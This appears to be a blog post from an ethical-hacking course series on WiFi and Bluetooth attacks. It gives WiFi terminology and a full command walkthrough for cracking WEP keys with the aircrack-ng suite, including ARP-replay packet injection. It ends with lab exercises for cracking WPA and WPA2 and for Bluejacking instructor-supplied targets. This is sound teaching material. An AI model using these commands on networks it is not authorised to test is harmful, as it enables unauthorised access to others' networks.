[ Certified Ethical Hacker v10 ] :: [ Module 12 ] :: WiFi and Bluetooth

This entry is part 14 of 21 in the series [ Certified Ethical Hacker Training ]

WiFi Basics

SSID: the human-readable name of the network

BSSID: the MAC address of the access point

ESSID: the name of a network that spans multiple access points

IVs: Initialization vectors, short string of bits that allow users to access the network with unique session keys

PWR (as listed in airodump-ng) is a negative number that indicates, basically, power loss. “Lower is better” means lower without the negative sign: -40 is better (more power, less loss) than -90 (lots of power loss) even though technically -90 is “lower.”

Alfa Networks wireless adapter – Usually just called an “Alfa card,” this is a high-powered USB-attached wifi adapter that makes MITM and evil hotspot exploits much easier.

WEP Cracking

WEP cracking is almost a useless skill to practice, because there are very few WEP-enabled access points in the wild today. Except that:

  • WEP cracking is a great way to learn the -ng tools (like airodump-ng), which will definitely deepen your understanding of wifi.
  • If you actually find a WEP access point you’ll be able to exploit it. (People forget to update things all the time.)

Note the commands:

# get wifi NIC name:

# start a monitor:
airmon-ng start wlan0 
# substitute your interface name if it's not wlan0

# note problem processes reported, and kill them:
kill <process_ID>
# repeat as necessary

# find nearby wifi networks:
airodump-ng wlan0mon # on older systems may be mon0
# copy the BSSID you want

# select a network:
airodump-ng -c <channel> -w <output_file> --bssid <target_bssid> wlan0mon # or mon0

# open a new window and associate with the access point:
aireplay-ng -1 0 -a <target_bssid> wlan0mon # or mon0
# -1 means authenticate with type 0, i.e. none
# now begin injecting to generate IVs:
aireplay-ng -3 -b <target_bssid> wlan0 # or mon0
# -3 is arp replay attack

# watch Data column in older window; you need ~15k or more

# open a new terminal and list files:
# the capture file will be the one with the
# <output_file> name above and the .cap extension

# crack the key:
aircrack-ng <filename>-01.cap #for example
# aircrack-ng will run over and over as IVs accumulate
# the password arrives in hex format: 01:02:03:04 etc.
# once you get the key, be sure to stop aireplay-ng

# and stop wlan0mon
airmon-ng stop wlan0mon

# restart normal networking 
# (restart the processes you killed above:
service networking start
service network-manager start
# etc.

Now open the GUI Network Manager (on the top right in Kali), select the target network, and enter the hex key you got above. Remove the semicolons.


  1. Cracking WEP with Kali: Go to page 453 in the Study Guide. Follow this process against the access point I will provide.
  2. Cracking WPA: Go to page 458 and follow the process of cracking WPA with Reaver and Wash.
  3. Cracking WPA2: Go to page 460 and follow the example using Wi-Fite.


Know the terminology:




Bluetooth bazooka


  1. Follow the procedure on page 473 to perform a Bluejacking exploit against the target I will supply. Does this attack still work on contemporary phones?
Series Navigation<< [ Certified Ethical Hacker v10 ] :: [ Module 11 ] :: SQL Injection[ Certified Ethical Hacker v10 ] :: [ Module 13 ] :: Hacking Mobile Devices >>

Leave a Reply